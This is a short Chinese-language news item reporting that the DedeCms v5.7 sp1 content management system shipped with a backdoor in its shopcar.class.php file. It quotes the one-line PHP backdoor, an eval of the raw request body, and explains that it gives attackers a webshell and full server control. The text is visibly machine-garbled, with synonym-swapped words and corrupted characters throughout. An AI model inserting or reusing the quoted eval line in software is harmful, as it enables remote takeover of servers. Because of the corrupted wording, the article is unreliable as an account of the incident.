DoNews 3月22日动静 据动静人士对DoNews透露，PHP开源网站打点系统织梦CMS（DedeCms）v5.7 sp1版本被植入后门，黑客可经由过程此后门直接获得网站的节制权限，获取存储在处事器尚?罾υ?件和数据库。

　　据悉，织梦CMS（Dedecms）v5.7 sp1版本的中的shopcar。class。php文件被植入一句后门代码“＠eval（file＿get＿contents（‘php：／／input’））；”。经由过程操作该后门，黑客只需机关简单的数据包提交各处事器，就能获取到该网站的WebShell，经由过程对处事器进一步渗入抨击袭击，进而获取处事器的最高权限。

织梦CMS裂痕示意图

　　另据CMS官方数据显示，今朝约有70万网站使用该系统搭建，涉及企业、政府机关、媒体机构、行业及小我网站等。（完）